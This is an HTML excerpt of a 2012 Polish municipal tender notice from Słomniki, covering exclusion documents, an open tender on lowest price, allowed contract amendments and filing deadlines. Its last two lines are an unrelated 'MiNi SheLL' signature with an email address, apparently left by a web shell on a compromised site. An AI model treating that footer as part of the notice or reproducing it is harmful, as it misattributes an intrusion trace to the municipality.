<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru WYKONAWCY, chyba że Zamawiający przewidział możliwość dokonania takiej zamiany w Ogłoszeniu o zamówieniu lub Specyfikacji Istotnych Warunków Zamówienia.
2.	Zamawiający dopuszcza możliwość zmian do umowy w tym przedłużenia terminu realizacji zamówienia tylko w przypadku wystąpienia okoliczności, które nie wynikają z winy Wykonawcy. Zmiana terminu zakończenia realizacji może nastąpić tylko w przypadku jej akceptacji przez Zamawiającego.
Zamawiający wyrazi zgodę na przedłużenie terminu tylko w przypadku potwierdzenia wystąpienia
okoliczności niezależnych od Wykonawcy.
3.	W związku z faktem, że procedura sporządzania dokumentacji jest skomplikowana może zajść konieczność dostosowania przedmiotu umowy do zaistniałych sytuacji, a co się z tym wiąże wydłużenia terminu realizacji wykonania zamówienia. Termin wykonania może ulec zmianie w przypadku:
1)	zmiany aktów prawnych oraz norm lub normatywów mających zastosowanie do przedmiotu umowy, 
2)	opóźnień w uzyskaniu uzgodnień
3)	trudności w uzyskaniu zgód od właścicieli działek, opóźnienia w uzyskaniu odpowiednich decyzji i uzgodnień , trudności z zawiadomieniem stron postępowania w sprawie wydania pozwolenia na budowę itp.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca/Zamawiający winien poinformować Zamawiającego/Wykonawcę pisemnie.

4.	Zmiany treści i warunków umowy mogą nastąpić również w przypadku wystąpienia:
1)	zmiany osób odpowiedzialnych za projektowanie- zmiana osób może nastąpić, po wcześniejszej akceptacji przez Zamawiającego, pod warunkiem, że wskazane osoby będą posiadały uprawnienia tożsame z wymaganymi przez Zamawiającego w niniejszej specyfikacji.
2)	siły wyższej,
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
3)	rezygnacji z części zamówienia przez Zamawiającego, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy
4)	zmiany zakresu zamówienia- zmiana może nastąpić w przypadku wystąpienia okoliczności uniemożliwiających wykonanie projektu w pierwotnej wersji, tj. brak zgody właściciela działki oraz konieczność przeprojektowania sieci.
5)	zmiany wartości umowy w sytuacji zmiany urzędowej stawki podatku VAT na oferowany przedmiot zamówienia. Zmiana taka może nastąpić od dnia wejścia w życie podpisanego aneksu do niniejszej umowy na podstawie pisemnego zgłoszenia Wykonawcy.
6)	Zmiany kluczowego personelu Wykonawcy / Zamawiającego
7)	Konieczności zmian w zakresie podwykonawstwa tj.
a.	zmiany podwykonawcy wskazanego w ofercie,
b.	zmiany części zamówienia którą Wykonawca zamierzał zlecić podwykonawcom,
c.	wprowadzenie podwykonawcy w przypadku gdy Wykonawca oświadczył w ofercie iż wykona przedmiot zamówienia bez udziału podwykonawców,
W przypadku zmian w zakresie podwykonawstwa maja zastosowania zapisy § 7 umowy.
5.	Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę/ Zamawiającego musi wpłynąć do Zamawiającego/Wykonawcy w formie pisemnej przed planowanym wprowadzeniem zmian. We wniosku o zmianę warunków umowy należy podać czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany.
6.	Zmiany do umowy muszą być wprowadzane aneksem w formie pisemnej po wcześniejszym zaakceptowaniu przez Zamawiającego/Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slomniki.pl/um/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Słomnikach  Ulica T.Kościuszki 64 ,32-090 Słomniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 11:00, miejsce: Urząd Miejski w Słomnikach  Ulica T. Kościuszki 64 ,32-090 Słomniki 
dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com